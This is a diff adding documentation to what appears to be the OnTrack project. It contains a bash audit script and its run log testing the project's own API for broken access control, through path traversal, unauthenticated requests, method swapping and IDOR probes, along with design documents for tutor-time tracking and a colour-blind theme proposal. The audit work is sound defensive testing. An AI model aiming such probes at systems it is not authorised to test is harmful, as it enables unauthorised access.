"${API_URL}/api/../admin" \ + -H "Username: ${REGULAR_USER_USERNAME}" \ + -H "Auth-Token: ${REGULAR_USER_TOKEN}" \ + -w "\n%{http_code}" 2>&1) + +URL_STATUS2=$(echo "$URL_RESULT2" | tail -n1) +URL_BODY2=$(echo "$URL_RESULT2" | sed '$d') + +check_denial "$URL_STATUS2" true "$URL_BODY2" "URL Manipulation: API path traversal attempt" "path_traversal" + +# Second test: Check for admin UI access through frontend +echo -e "${YELLOW}Manually check if regular users can access ${CLIENT_URL}/#/admin/units${NC}" | tee -a "$LOG_FILE" +log_result "UI Access Control" "${YELLOW}MANUAL CHECK NEEDED: Verify if students can access admin pages${NC}" "Check if regular users can access: ${CLIENT_URL}/#/admin/units" + +# ===== TEST 5: MISSING ACCESS CONTROLS ===== +echo -e "\n${BLUE}Test 5: Missing Access Controls${NC}" | tee -a "$LOG_FILE" +echo -e "${BLUE}Testing if critical endpoints are missing access controls${NC}\n" + +# Use existing API endpoints file or create a minimal one +ENDPOINTS_FILE="./api_endpoints.txt" +if [ ! -f "$ENDPOINTS_FILE" ]; then + echo -e "${YELLOW}API endpoints file not found. Creating a minimal list for testing...${NC}" + + cat > "$ENDPOINTS_FILE" << EOF +# Basic API endpoints for testing +/api/settings +/api/users +/api/units +EOF +fi + +echo -e "${YELLOW}Test 5.1: Testing access to sensitive endpoints without proper authentication...${NC}" + +# Read endpoints directly from file, skipping comments and empty lines +while IFS= read -r line || [ -n "$line" ]; do + # Skip empty lines and comments + [[ -z "$line" || "$line" == \#* ]] && continue + + endpoint="$line" + + # Test without authentication + NO_AUTH_RESULT=$(curl -s -X GET "${API_URL}${endpoint}" \ + -w "\n%{http_code}" 2>&1) + + NO_AUTH_STATUS=$(echo "$NO_AUTH_RESULT" | tail -n1) + NO_AUTH_BODY=$(echo "$NO_AUTH_RESULT" | sed '$d') + + # Skip endpoints that don't exist + if [[ $NO_AUTH_STATUS == 404 ]]; then + log_result "Missing Access Control (${endpoint})" "${YELLOW}SKIPPED: Endpoint not found (404)${NC}" "Response: $NO_AUTH_BODY" + ((TESTS_SKIPPED++)) + continue + fi + + check_denial "$NO_AUTH_STATUS" true "$NO_AUTH_BODY" "Missing Access Control: No auth on ${endpoint}" "missing_access" +done < "$ENDPOINTS_FILE" + +for endpoint in "${SENSITIVE_ENDPOINTS[@]}"; do + # Test with no authentication + NO_AUTH_RESULT=$(curl -s -X GET "${API_URL}${endpoint}" \ + -w "\n%{http_code}" 2>&1) + + NO_AUTH_STATUS=$(echo "$NO_AUTH_RESULT" | tail -n1) + NO_AUTH_BODY=$(echo "$NO_AUTH_RESULT" | sed '$d') + + # If it's a 404, we'll skip it as the endpoint might not exist + if [[ $NO_AUTH_STATUS == 404 ]]; then + log_result "Missing Access Control (${endpoint})" "${YELLOW}SKIPPED: Endpoint not found (404)${NC}" "Response: $NO_AUTH_BODY" + ((TESTS_SKIPPED++)) + continue + fi + + check_denial "$NO_AUTH_STATUS" true "$NO_AUTH_BODY" "Missing Access Control: No auth on ${endpoint}" "missing_access" +done + +# ===== TEST 6: HTTP METHOD MANIPULATION ===== +echo -e "\n${BLUE}Test 6: HTTP Method Manipulation${NC}" | tee -a "$LOG_FILE" +echo -e "${BLUE}Testing if changing HTTP methods can bypass access controls${NC}\n" + +# Test 6.1: Try inappropriate HTTP methods on endpoints +echo -e "${YELLOW}Test 6.1: Testing inappropriate HTTP methods on API endpoints...${NC}" + +# Try PUT on a GET-only endpoint +METHOD_RESULT1=$(curl -s -X PUT "${API_URL}/api/units" \ + -H "Username: ${REGULAR_USER_USERNAME}" \ + -H "Auth-Token: ${REGULAR_USER_TOKEN}" \ + -d "{\"dummy\":\"data\"}" \ + -w "\n%{http_code}" 2>&1) + +METHOD_STATUS1=$(echo "$METHOD_RESULT1" | tail -n1) +METHOD_BODY1=$(echo "$METHOD_RESULT1" | sed '$d') + +check_denial "$METHOD_STATUS1" true "$METHOD_BODY1" "HTTP Method Manipulation: PUT on GET endpoint" "http_method" + +# Try DELETE on a GET-only endpoint +METHOD_RESULT2=$(curl -s -X DELETE "${API_URL}/api/units/1" \ + -H "Username: ${REGULAR_USER_USERNAME}" \ + -H "Auth-Token: ${REGULAR_USER_TOKEN}" \ + -w "\n%{http_code}" 2>&1) + +METHOD_STATUS2=$(echo "$METHOD_RESULT2" | tail -n1) +METHOD_BODY2=$(echo "$METHOD_RESULT2" | sed '$d') + +check_denial "$METHOD_STATUS2" true "$METHOD_BODY2" "HTTP Method Manipulation: DELETE on GET endpoint" "http_method" + +# ===== TEST 7: FUNCTION LEVEL ACCESS CONTROLS ===== +echo -e "\n${BLUE}Test 7: Function Level Access Controls${NC}" | tee -a "$LOG_FILE" +echo -e "${BLUE}Testing if sensitive functions are properly protected${NC}\n" + +# Test 7.1: Regular user attempts to perform admin functions +echo -e "${YELLOW}Test 7.1: Regular user attempting to perform admin functions...${NC}" + +# Try to create a teaching period (assuming this is an admin function) +FUNC_RESULT1=$(curl -s -X POST "${API_URL}/api/teaching_periods" \ + -H "Content-Type: application/json" \ + -H "Username: ${REGULAR_USER_USERNAME}" \ + -H "Auth-Token: ${REGULAR_USER_TOKEN}" \ + -d "{\"teaching_period\":{\"name\":\"Test Period\",\"start_date\":\"2025-01-01\",\"end_date\":\"2025-06-30\"}}" \ + -w "\n%{http_code}" 2>&1) + +FUNC_STATUS1=$(echo "$FUNC_RESULT1" | tail -n1) +FUNC_BODY1=$(echo "$FUNC_RESULT1" | sed '$d') + +if [[ $FUNC_STATUS1 == 404 ]]; then + log_result "Function Level Access Control: Create teaching period" "${YELLOW}SKIPPED: Endpoint not found (404)${NC}" "Response: $FUNC_BODY1" + ((TESTS_SKIPPED++)) +else + check_denial "$FUNC_STATUS1" true "$FUNC_BODY1" "Function Level Access Control: Create teaching period" "function_level" +fi + +# ===== CONTROL TEST: VERIFY PROPER ACCESS ===== +echo -e "\n${BLUE}Control Test: Verify Proper Access${NC}" | tee -a "$LOG_FILE" +echo -e "${BLUE}Verifying that legitimate access still works properly${NC}\n" + +# Test that admin can access admin resources +echo -e "${YELLOW}Control Test 1: Verifying admin can access admin resources...${NC}" +CONTROL_RESULT1=$(curl -s -X GET "${API_URL}/api/units" \ + -H "Username: ${ADMIN_USERNAME}" \ + -H "Auth-Token: ${ADMIN_TOKEN}" \ + -w "\n%{http_code}" 2>&1) + +CONTROL_STATUS1=$(echo "$CONTROL_RESULT1" | tail -n1) +CONTROL_BODY1=$(echo "$CONTROL_RESULT1" | sed '$d') + +check_denial "$CONTROL_STATUS1" false "$CONTROL_BODY1" "Control Test: Admin accessing permitted resources" + +# Test that regular user can access their own resources +echo -e "${YELLOW}Control Test 2: Verifying regular user can access permitted resources...${NC}" +CONTROL_RESULT2=$(curl -s -X GET "${API_URL}/api/units" \ + -H "Username: ${REGULAR_USER_USERNAME}" \ + -H "Auth-Token: ${REGULAR_USER_TOKEN}" \ + -w "\n%{http_code}" 2>&1) + +CONTROL_STATUS2=$(echo "$CONTROL_RESULT2" | tail -n1) +CONTROL_BODY2=$(echo "$CONTROL_RESULT2" | sed '$d') + +check_denial "$CONTROL_STATUS2" false "$CONTROL_BODY2" "Control Test: Regular user accessing permitted resources" "control_user" + +# ===== Test Summary ===== +echo -e "\n${BLUE}===== Test Summary =====${NC}" | tee -a "$LOG_FILE" +echo -e "${BLUE}Tests completed at $(date)${NC}" | tee -a "$LOG_FILE" +echo -e "${BLUE}Log file saved to: ${NC}$LOG_FILE" | tee -a "$LOG_FILE" + +echo -e "\n${GREEN}Tests Passed: $TESTS_PASSED${NC}" | tee -a "$LOG_FILE" +echo -e "${RED}Tests Failed: $TESTS_FAILED${NC}" | tee -a "$LOG_FILE" +echo -e "${YELLOW}Tests Skipped/Inconclusive: $TESTS_SKIPPED${NC}" | tee -a "$LOG_FILE" + +if [ $TESTS_FAILED -eq 0 ]; then + echo -e "\n${GREEN}SUCCESS: No broken access control vulnerabilities detected.${NC}" | tee -a "$LOG_FILE" + echo -e "${GREEN}✓ Access control mechanisms appear to be functioning correctly${NC}" | tee -a "$LOG_FILE" + echo -e "${GREEN}✓ Unauthorized access attempts were properly denied${NC}" | tee -a "$LOG_FILE" + echo -e "${GREEN}✓ Legitimate access is still permitted${NC}" | tee -a "$LOG_FILE" +else + echo -e "\n${RED}WARNING: Potential broken access control vulnerabilities detected.${NC}" | tee -a "$LOG_FILE" + echo -e "${RED}Review the log file for details on the failed tests.${NC}" | tee -a "$LOG_FILE" + echo -e "${RED}These issues may allow unauthorized access to restricted resources.${NC}" | tee -a "$LOG_FILE" +fi + +exit 0 diff --git a/src/content/docs/BACaudit/broken_access_control_test_20250501_204935.log b/src/content/docs/BACaudit/broken_access_control_test_20250501_204935.log new file mode 100644 index 00000000..5aaa057e --- /dev/null +++ b/src/content/docs/BACaudit/broken_access_control_test_20250501_204935.log @@ -0,0 +1,152 @@ +===== Broken Access Control Test ===== +Expected result: All unauthorized access attempts should be denied + +Obtaining authentication tokens for testing... +Test 1: Vertical Privilege Escalation +[Vertical Privilege Escalation: Regular user creating unit] - PASS: Access denied as expected (Status: 403) +Response: {"error":"Not authorised to create a unit"} + +[Vertical Privilege Escalation: Regular user accessing admin dashboard] - PASS: Access denied as expected (Status: 403) +Response: {"error":"Unable to list units"} + + +Test 2: Insecure Direct Object References (IDOR) +[IDOR: Accessing another user's data by ID] - FAIL: Access was allowed but should have been denied (Status: 200) +Response: {"id":2,"student_id":"11111111","email":"student_1@doubtfire.com","first_name":"First Name","last_name":"Surname","username":"student_1","nickname":"Nickname","receive_task_notifications":true,"receive_portfolio_notifications":true,"receive_feedback_notifications":true,"opt_in_to_research":false,"has_run_first_time_setup":true,"system_role":"Student"} + +[IDOR: Accessing unauthorized unit data] - PASS: Access denied as expected (Status: 403) +Response: {"error":"Couldn't find Unit with id=1"} + + +Test 3: Session Token Misuse +[Session Token Misuse: Regular user with admin token] - PASS: Access denied as expected (Status: 419) +Response: {"error":"No authentication details provided. Authentication is required to access this resource."} + +[Session Token Misuse: Admin user with regular token] - PASS: Access denied as expected (Status: 419) +Response: {"error":"No authentication details provided. Authentication is required to access this resource."} + + +Test 4: URL Manipulation +[URL Manipulation: Using admin=true parameter] - PASS: Access denied as expected (Status: 403) +Response: {"error":"Unable to list units"} + +[URL Manipulation: API path traversal attempt] - ATTENTION REQUIRED: Path traversal test returned 404 +Response: 404 Not Found + +[URL Manipulation: API path traversal attempt] - NOTE: While the server returned 404, manual verification is recommended +Check if admin resources are accessible through other means + +Manually check if regular users can access /#/admin/units +[UI Access Control] - MANUAL CHECK NEEDED: Verify if students can access admin pages +Check if regular users can access: /#/admin/units + + +Test 5: Missing Access Controls +[Missing Access Control: No auth on /api/activity_types] - INCONCLUSIVE: Endpoint returns empty result (Status: 200) +Response: [] + +[Missing Access Control: No auth on /api/activity_types] - NOTE: Although no actual data is returned, the endpoint can be accessed without authentication +Consider requiring authentication based on the security requirements + +[Missing Access Control (/api/admin)] - SKIPPED: Endpoint not found (404) +Response: 404 Not Found + +[Missing Access Control: No auth on /api/auth] - PASS: Access denied as expected (Status: 405 - Method Not Allowed) +Response: {"error":"405 Not Allowed"} + +[Missing Access Control: No auth on /api/campuses] - INCONCLUSIVE: Endpoint returns empty result (Status: 200) +Response: [] + +[Missing Access Control: No auth on /api/campuses] - NOTE: Although no actual data is returned, the endpoint can be accessed without authentication +Consider requiring authentication based on the security requirements + +[Missing Access Control (/api/csv)] - SKIPPED: Endpoint not found (404) +Response: 404 Not Found + +[Missing Access Control: No auth on /api/projects] - PASS: Access denied as expected (Status: 419) +Response: {"error":"No authentication details provided. Authentication is required to access this resource."} + +[Missing Access Control: No auth on /api/settings] - FAIL: Access was allowed but should have been denied (Status: 200) +Response: {"externalName":"OnTrack","overseerEnabled":false,"tiiEnabled":false,"d2lEnabled":false} + +[Missing Access Control: No auth on /api/students] - PASS: Access denied as expected (Status: 419) +Response: {"error":"No authentication details provided. Authentication is required to access this resource."} + +[Missing Access Control (/api/submission)] - SKIPPED: Endpoint not found (404) +Response: 404 Not Found + +[Missing Access Control: No auth on /api/tasks] - PASS: Access denied as expected (Status: 419) +Response: {"error":"No authentication details provided. Authentication is required to access this resource."} + +[Missing Access Control: No auth on /api/teaching_periods] - INCONCLUSIVE: Endpoint returns empty result (Status: 200) +Response: [] + +[Missing Access Control: No auth on /api/teaching_periods] - NOTE: Although no actual data is returned, the endpoint can be accessed without authentication +Consider requiring authentication based on the security requirements + +[Missing Access Control: No auth on /api/tii_actions] - PASS: Access denied as expected (Status: 419) +Response: {"error":"No authentication details provided. Authentication is required to access this resource."} + +[Missing Access Control: No auth on /api/tii_eula] - INCONCLUSIVE: Endpoint returns empty result (Status: 200) +Response: null + +[Missing Access Control: No auth on /api/tii_eula] - NOTE: Although no actual data is returned, the endpoint can be accessed without authentication +Consider requiring authentication based on the security requirements + +[Missing Access Control: No auth on /api/tii_hook] - PASS: Access denied as expected (Status: 405 - Method Not Allowed) +Response: {"error":"405 Not Allowed"} + +[Missing Access Control: No auth on /api/tutorials] - PASS: Access denied as expected (Status: 419) +Response: {"error":"No authentication details provided. Authentication is required to access this resource."} + +[Missing Access Control: No auth on /api/unit_roles] - PASS: Access denied as expected (Status: 419) +Response: {"error":"No authentication details provided. Authentication is required to access this resource."} + +[Missing Access Control: No auth on /api/units] - PASS: Access denied as expected (Status: 419) +Response: {"error":"No authentication details provided. Authentication is required to access this resource."} + +[Missing Access Control: No auth on /api/users] - PASS: Access denied as expected (Status: 419) +Response: {"error":"No authentication details provided. Authentication is required to access this resource."} + +[Missing Access Control (/api/webcals)] - SKIPPED: Endpoint not found (404) +Response: 404 Not Found + + +Test 6: HTTP Method Manipulation +[HTTP Method Manipulation: PUT on GET endpoint] - PASS: Access denied as expected (Status: 405 - Method Not Allowed) +Response: {"error":"405 Not Allowed"} + +[HTTP Method Manipulation: DELETE on GET endpoint] - PASS: Access denied as expected (Status: 405 - Method Not Allowed) +Response: {"error":"405 Not Allowed"} + + +Test 7: Function Level Access Controls +[Function Level Access Control: Create teaching period] - INCONCLUSIVE: Request was processed but failed validation (Status: 400) +Response: {"error":"teaching_period[period] is missing, teaching_period[year] is missing, teaching_period[active_until] is missing"} + +[Function Level Access Control: Create teaching period] - NOTE: The API is accepting the request but rejecting it due to missing parameters +This suggests the endpoint might lack proper permission checks, but further testing is needed + + +Control Test: Verify Proper Access +[Control Test: Admin accessing permitted resources] - PASS: Access allowed as expected (Status: 200) +Response: [{"code":"test1","id":1,"name":"test1","my_role":"Convenor","main_convenor_user_id":1,"description":"test1","start_date":"1234-11-10","end_date":"2222-11-10","active":true},{"code":"test 2","id":2,"name":"test2","my_role":"Convenor","main_convenor_user_id":1,"description":"test2","start_date":"2025-05-05","end_date":"2025-08-25","active":true},{"code":"test 3","id":3,"name":"test3","my_role":"Convenor","main_convenor_user_id":1,"description":"test3","start_date":"2025-05-05","end_date":"2025-08-25","active":true},{"code":"test 4","id":122,"name":"test4","my_role":"Convenor","main_convenor_user_id":1,"description":"test4","start_date":"2025-03-02","end_date":"2025-06-22","active":true}] + +[Control Test: Regular user accessing permitted resources] - INCONCLUSIVE: Regular user may not have units assigned +Response: {"error":"Unable to list units"} + +[Control Test: Regular user accessing permitted resources] - NOTE: The 403 response might be legitimate if the user doesn't have any assigned units +This is expected behavior if the user's role doesn't include any units + + +===== Test Summary ===== +Tests completed at Thu 1 May 2025 20:49:45 AEST +Log file saved to: broken_access_control_test_20250501_204935.log + +Tests Passed: 19 +Tests Failed: 2 +Tests Skipped/Inconclusive: 11 + +WARNING: Potential broken access control vulnerabilities detected. +Review the log file for details on the failed tests. +These issues may allow unauthorized access to restricted resources. diff --git a/src/content/docs/backend/tutor_times/design_document.md b/src/content/docs/backend/tutor_times/design_document.md new file mode 100644 index 00000000..daecf39e --- /dev/null +++ b/src/content/docs/backend/tutor_times/design_document.md @@ -0,0 +1,199 @@ +--- +title: Design Document +--- + +## 1. Introduction + +### 1.1 Purpose + +This document outlines the backend design for the "Tutor Times" and assessment analytics feature in OnTrack. It defines the architecture, schema, and API-level implementation details to support real-time tracking and management of tutor marking sessions across units and tasks. + +### 1.2 Scope + +This design covers: + +- Data Models and Schema (updated to support real-time analytics) +- RESTful API Endpoints +- Real-Time Tracking Integration +- Authentication and Authorization +- Session Lifecycle and Timeout Logic +- Data Aggregation and Integrity Constraints +- Performance Optimization +- Security +- Compatibility with Frontend and Related Modules + +### 1.3 Intended Audience + +This document is for backend developers, technical leads, and other stakeholders involved in implementing and maintaining the Tutor Times and Assessment Analytics features. + +--- + +## 2. Architecture and Data Models + +![Tutor Times ERD](tutor_times_erd.png) + +### 2.1 Data Storage + +- Introduce new tables: + - `marking_sessions` – captures marking periods tied to tutors and units. + - `session_activities` – logs discrete user interactions like task assessments. + +### 2.2 Schema Definition + +#### `marking_sessions` Table + +| Column | Type | Notes | +| ------------------ | -------- | --------------------------------------- | +| `id` | bigint | Primary key | +| `marker_id` | bigint | FK to `users`, tutor performing marking | +| `unit_id` | bigint | FK to `units` | +| `ip_address` | string | IP address of tutor | +| `start_time` | datetime | Session start | +| `end_time` | datetime | Session end | +| `duration_minutes` | integer | Total duration | +| `created_at` | datetime | Auto-generated | +| `updated_at` | datetime | Auto-generated | + +#### `session_activities` Table + +| Column | Type | Notes | +| -------------------- | -------- | ----------------------------------------------- | +| `id` | bigint | Primary key | +| `marking_session_id` | bigint | FK to `marking_sessions` | +| `action` | string | e.g. `'inbox'`, `'GET'`, `'PUT'`, `'assessing'` | +| `project_id` | bigint | Optional FK | +| `task_id` | bigint | Optional FK | +| `task_definition_id` | bigint | Optional FK | +| `created_at` | datetime | Auto-generated | +| `updated_at` | datetime | Auto-generated | + +### 2.3 Relationships + +- `marking_sessions.marker_id` -> `users.id` +- `marking_sessions.unit_id` -> `units.id` +- `session_activities.marking_session_id` -> `marking_sessions.id` + +### 2.4 Data Integrity Constraints + +- A session must be unique per (user, unit, IP) in a rolling time window (e.g. 15 minutes). +- duration_minutes must be positive for completed sessions. +- action must be whitelisted (inbox, GET, PUT, assessing, etc.). + +--- + +## 3. API and Tracking Logic + +### 3.1 Tracking Integration Points + +Use the new SessionTracker service in endpoints like so: + +```ruby +if current_user.tutor? && @task.project.user != current_user + SessionTracker.record_assessment_activity( + action: 'assessing', + user: current_user, + project: @task.project, + task: @task, + ip_address: request.remote_ip + ) +end +``` + +### 3.2 SessionTracker Service + +This service class handles the lifecycle of marking sessions and their associated activities. It abstracts away the logic for determining whether to continue an existing session or start a new one based on user, unit, IP address, and recent activity. It also ensures that relevant session statistics—like assessment counts and durations—are updated in real time whenever an action (like marking) is recorded. + +```ruby +class SessionTracker + THRESHOLD = 15 # minutes + + def self.record_assessment_activity(action:, user:, project:, task: nil, ip_address:) + session = find_or_create_session(user, project.unit, ip_address) + + activity = session.activities.create!( + action: action, + project_id: project.id, + task_id: task&.id, + task_definition_id: task&.task_definition_id, + created_at: DateTime.now + ) + + session.update_session_details if action == 'assessing' + activity + end + + def self.find_or_create_session(user, unit, ip_address) + session = MarkingSession.where( + marker: user, + unit: unit, + ip_address: ip_address + ).where("updated_at > ?", THRESHOLD.minutes.ago).last + + unless session + session = MarkingSession.create!( + marker: user, + unit: unit, + ip_address: ip_address, + start_time: DateTime.now + ) + end + + session + end +end +``` + +--- + +## 4. Authentication and Authorization + +- Tutors: can only record their own session activities. +- Unit Chairs and Admins: can view aggregated session data. + +--- + +## 5. Background Jobs & Triggers + +### 5.1 Aggregation Logic + +- Real-time data stored directly in marking_sessions and session_activities. + - Nightly job for parsing CSV logs is no longer needed. + +--- + +## 6. Non-Functional Requirements + +### 6.1 Performance + +- Index marking_sessions on (marker_id, unit_id, ip_address, updated_at) +- Index session_activities on action, task_id, and created_at + +### 6.2 Security + +- Ensure SessionTracker only accepts input from authenticated requests. +- Use encrypted session tokens; store IPs carefully (with privacy policies). + +--- + +## 7. Testing Strategy + +### 7.1 Unit Testing + +- Add tests for SessionTracker.record_assessment_activity +- Test controller hooks for update, inbox, and assessing actions + +--- + +## 8. Deployment Plan + +### 8.1 Environment + +- Deploy to staging, then production following standard CI/CD pipelines + +--- + +## 9. Conclusion + +This updated design integrates real-time assessment tracking via the SessionTracker service and two new data models. This approach replaces deferred processing with live analytics, allowing for more accurate, responsive tutor activity tracking while simplifying background job complexity. + +--- diff --git a/src/content/docs/backend/tutor_times/requirements_document.md b/src/content/docs/backend/tutor_times/requirements_document.md new file mode 100644 index 00000000..5c39cfd0 --- /dev/null +++ b/src/content/docs/backend/tutor_times/requirements_document.md @@ -0,0 +1,88 @@ +--- +title: Requirements Document +--- + +## 1. Overview + +This document outlines the functional and non-functional requirements for implementing the "Tutor Times" and assessment analytics feature in OnTrack. These requirements guide backend development to support real-time tracking of tutor marking activity, replacing delayed CSV-based processing. + +--- + +## 2. Functional Requirements + +### 2.1 Tracking Tutor Activity + +- System must track when a tutor begins interacting with a unit from a unique IP address. +- A new marking session should start if no activity has been recorded in the past 15 minutes from the same (user, unit, IP). +- each tutor action (e.g. opening inbox, GET, PUT, assessing), a new `session_activity` record must be created. +- If the action is `'assessing'`, the corresponding `marking_session` must update: + - `duration_minutes` (based on start and latest activity) + +### 2.2 API Integration + +- Backend API endpoints involved in tutor task interactions must invoke `SessionTracker.record_assessment_activity(...)`. +- system must automatically determine whether to continue an existing session or create a new one based on recent activity. + +### 2.3 Data Model Requirements + +- The database must support two new tables: `marking_sessions` and `session_activities`. +- Referential integrity must be enforced via foreign keys for users, units, and projects. + +### 2.4 Authorization + +- Only authenticated tutors can trigger session activity recording. +- Only authorized staff (Unit Chairs, Admins) can access aggregated session data. + +--- + +## 3. Non-Functional Requirements + +### 3.1 Performance + +- All tracking must be performed in real-time with minimal latency (< 200ms per request). +- Queries on sessions and activities must be performant at scale; appropriate indexing is required. + +### 3.2 Security + +- Session tracking must only occur from authenticated API requests. +- IP addresses must be stored securely in line with privacy regulations and university policy. + +### 3.3 Reliability + +- The SessionTracker logic must be idempotent and fault-tolerant to network or DB errors. +- The session lifecycle logic must prevent duplicates or overlaps from the same user/IP/unit combo. + +--- + +## 4. Constraints + +- Cannot track activities older than 15 minutes to avoid backdating. +- Must be backwards compatible with frontend interaction models. +- Deprecated CSV parsing logic will be removed post-rollout. + +--- + +## 5. Success Criteria + +- Real-time tutor sessions and activities are visible in admin reports. +- No performance degradation is observed in marking workflows. +- Data model changes do not impact unrelated modules. +- Tutor engagement metrics are reliably captured for at least 95% of relevant actions. + +--- + +## 6. Dependencies + +- Existing `users`, `units`, `projects`, and `tasks` tables +- User authentication middleware (Devise, JWT, etc.) +- Request context (to capture IP and current_user) + +--- + +## 7. Glossary + +- **Marking Session:** A continuous period in which a tutor is actively marking tasks in a unit from a given IP address. +- **Session Activity:** A discrete action (GET, PUT, assessing, etc.) taken by a tutor during a session. +- **THRESHOLD:** A rolling inactivity window (15 minutes) used to define session boundaries. + +--- diff --git a/src/content/docs/backend/tutor_times/tutor_times_erd.png b/src/content/docs/backend/tutor_times/tutor_times_erd.png new file mode 100644 index 00000000..73dc71b6 Binary files /dev/null and b/src/content/docs/backend/tutor_times/tutor_times_erd.png differ diff --git a/src/content/docs/frontend/colourvision.md b/src/content/docs/frontend/colourvision.md new file mode 100644 index 00000000..447cf01f --- /dev/null +++ b/src/content/docs/frontend/colourvision.md @@ -0,0 +1,425 @@ +--- +title: Colour Vision Accessability Theme Picker +--- + +## Introduction + +This is where tickets for implementation of this feature currently live + +### TASK SCOPE #READ ME FIRST + +This proposal is to add an accessibility feature to improve the user experience of users with colour deficiency, specifically those with protanopia, dueteranopia, and tritanopia (red/green deficiencies, and red yellow deficiency). + +Motivation - + +Approximately 1/15 men and 1/200 women have some degree of colour vision deficiency. This is a non-trivial number of current OnTrack users. Providing a theme option that adjusts colours to be optimized for specific colour deficiencies ensures OnTrack is accessible to a wider audience + +There are certain web accessibility standards (WCAG 2.1) that this feature would be in compliance with, and demonstrates a commitment to inclusivity. + +Proposed implementation + +Theme options: + +Build themes that can dynamically allocate colours to existing coloured components. Colour pallets should be explicitely defined and compliant with accessibility standard + +Default + +Deuteranopia + +Protanopia + +Tritanopia + +User interface + +As a user I want to navigate to /edit_profile and select from a THEME dropdown menu + +1. Default Colours [ sample colours ] + +2. Deuteranopia [ sample colours ] + +3. Protanopia [ sample colours ] + +4. Tritanopia [ sample colours ] + +Persistance + +Store the users selected theme in user profile settings in the db. + +High Level Requirement Analysis + +Front End + +File Updates + +1.modify the /edit_profile page to include UI compoenent for theme selection + +2.update doubtfire-web/src/styles global stylesheets to support new themes (consider migrating to ts) + +Components + +1. create scalable ThemeSelector component for dropdown menu + +2. implement dynamic theme switching using ccs variables or ts voodoo magic + +Testing + +1. write unit testing for ThemeSelector component + + + + +Back End + +File Updates + +1. Update user model to include theme field + +2. Modify api endpoints to handle theme changes + +DB changes + +1. write migration to include + +t.bool is_CVD and + +t.index ["CVD"] name: "Deuteranope", "Protanope", "Tritanope" + +columns in users table + +Testing + +1. add tests to validate api behavior in user profile + +Misc + +Documentation + +1. Update documentation where appropriate + +Timeline (would be nice but unlikely to get to deployment in this semester) + +Sprint 1 - Feature approval, design mockup, colour palletes confirmed, implementation scoped and ticketed + +Sprint 2 - Implementation of front and backend changes + +Sprint 3 - Implementation of front and backend changes + +Sprint 4 - Testing and bug fix + +### WHAT IS CVD #READ ME SECOND + +WHAT IS CVD +Colour Vision Deficiency (CVD) refers to the reduced ability to distinguish between certain colours. Commonly referred to as "colour blindness," CVD rarely means seeing no colour at all—instead, it usually involves difficulty distinguishing specific colours. The most common types are: + +Deuteranopia – affects green cone cells (green-red blindness, most common) + +Protanopia – affects red cone cells (red-green blindness, pretty rare) + +Tritanopia – affects blue cone cells (blue-yellow blindness, very rare) + +Globally, around 1 in 12 men and 1 in 200 women experience some form of CVD, making it a significant accessibility consideration in user interface design. For users with CVD, poorly chosen colour schemes can result in key interface elements being indistinguishable or misinterpreted, directly impacting their ability to effectively use an application. This is already affecting users of OnTrack + +From a user experience (UX) perspective, this task is about inclusivity—ensuring OnTrack is accessible to a broader range of users. From a technical perspective, it involves designing a system that supports dynamic theme switching, building colour palettes that are perceptually distinct for users with each type of CVD, and ensuring those palettes are applied consistently across the app. It also means persisting these preferences per user and adapting components to use variables or styling strategies that make theme switching seamless and maintainable. + +By building these themes, we move toward compliance with WCAG 2.1 accessibility standards, while also enhancing usability and demonstrating that accessibility is a core value of the OnTrack platform. This task is not just about colours—it’s about creating a better experience for everyone. + +### PROPOSED COLOUR REPLACEMENTS MASTER LIST + +STATUSES - note this is in .scss + +DEFAULT - Already implemented + +$task-status-color-scheme-default: ( +ready-for-feedback: #0079d8, + +not-started: #cccccc, + +working-on-it: #eb8f06, + +need-help: #a48fce, + +fix-and-resubmit: #f2d85c, + +feedback-exceeded: #d46b54, + +redo: #804000, + +discuss: #31b0d5, + +demonstrate: #428bca, + +complete: #5bb75b, + +fail: #d93713, + +time-exceeded: #d93713, + +); + + + +Deuteranopia + +Use blues, purples, and yellows. + + + +$task-status-color-scheme-deuteranopia: ( + +ready-for-feedback: #0079d8, + +not-started: #cccccc, + +working-on-it: #ffb000, + +need-help: #9e79b9, + +fix-and-resubmit: #fada5e, + +feedback-exceeded: #a34a02, + +redo: #5c3c11, + +discuss: #2f8bc9, + +demonstrate: #4378a0, + +complete: #4682b4, + +fail: #a60303, + +time-exceeded: #a60303, + +); + + + +Protanopia + +Avoid Reds / Oranges + + + +$task-status-color-scheme-protanopia: ( + +ready-for-feedback: #0079d8, + +not-started: #cccccc, + +working-on-it: #f0a500, + +need-help: #9270d1, + +fix-and-resubmit: #fff16b, + +feedback-exceeded: #996600, + +redo: #6f4e37, + +discuss: #3ca9d0, + +demonstrate: #507dbc, + +complete: #569f59, + +fail: #7a0019, + +time-exceeded: #7a0019, + +); + + + +Tritanopia + +Use reds, pinks, and teals to ensure separation. + +$task-status-color-scheme-tritanopia: ( + +ready-for-feedback: #d36f6f, + +not-started: #cccccc, + +working-on-it: #d99d00, + +need-help: #bc82cc, + +fix-and-resubmit: #f5c900, + +feedback-exceeded: #9c4b2f, + +redo: #7a5230, + +discuss: #58a575, + +demonstrate: #3e886f, + +complete: #4caf50, + +fail: #b00020, + +time-exceeded: #b00020, + +); + +--- +GRAPH - note this is in .coffeescript + +DEFAULT - Already implemented + +$burndown-chart-color-scheme-default = { +now: '#CACACA', +projected: '#AAAAAA', +target: '#777777', +done: '#0079d8', +signoff: '#E01B5D' +} + + +Deuteranopia +$burndown-chart-color-scheme-deuteranopia = { +now: '#bcbcbc', +projected: '#a0a0a0', +target: '#707070', +done: '#0073b9', # vivid blue +signoff: '#aa5585' # purple-ish pink +} + +Protanopia + +$burndown-chart-color-scheme-protanopia = { +now: '#bcbcbc', +projected: '#a0a0a0', +target: '#707070', +done: '#2282a8', # teal-blue +signoff: '#a05c78' # mauve/purple-red +} + +Tritanopia +$burndown-chart-color-scheme-tritanopia = { +now: '#bcbcbc', +projected: '#a0a0a0', +target: '#707070', +done: '#4c9c4c', # green +signoff: '#cc4a60' # muted red/pink +} + +### Theme selection integration in profile setting + +Integrate a dropdown menu within the /edit_profile page that allows users to select a preferred theme so that + +AS A USER +IF I select the dropdown menu +THEN I can select one of four options +AND my selection is bound + +Proposed implementation: +Modify existing edit-profile.component.ts and its corresponding template edit-profile.component.html to include the theme selection dropdown +See attached design schematic for wireframe design. Note laughing at the design is not permitted. +Drop down options should include 'Default', 'Deuteranopia', 'Protanopia', 'Tritanopia' +The selected theme should be bound to the user profile model to make sure the selection is captured +Acceptance Criteria +drop down menu is visible in /edit_profile +drop down menu is clickable +drop down menu displays four lines +Default +Deuteranopia +Protanopia +Tritanopia +opening and closing menu successfully interacts with other components on the page 